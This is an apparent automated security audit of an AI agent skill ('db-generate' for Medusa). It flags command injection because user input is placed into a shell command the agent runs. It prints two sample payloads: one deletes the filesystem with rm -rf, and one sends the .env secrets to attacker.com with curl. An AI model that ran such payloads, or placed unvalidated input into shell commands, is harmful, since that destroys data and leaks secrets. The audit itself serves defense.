Skills
skills/medusajs/medusa-agent-skills/db-generate/Gen Agent Trust Hub

db-generate

Fail

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: HIGHPROMPT_INJECTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
  • PROMPT_INJECTION (HIGH): The skill allows for direct command injection by instructing the agent to place unvalidated user input (<module-name>) into a shell command template (npx medusa db:generate <module-name>). An attacker could provide a payload such as module; rm -rf / or module; curl http://attacker.com/$(cat .env) to execute arbitrary code or exfiltrate secrets.- COMMAND_EXECUTION (HIGH): The skill uses the Bash tool to run commands constructed at runtime using external data. This pattern is inherently dangerous without strict input filtering or the use of safe execution APIs that avoid shell interpolation.- EXTERNAL_DOWNLOADS (LOW): The skill relies on npx to execute the Medusa CLI. This may trigger downloads from the public npm registry. While Medusa is a reputable framework, the lack of version pinning or integrity checks for the environment is a minor risk factor.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 17, 2026, 06:01 PM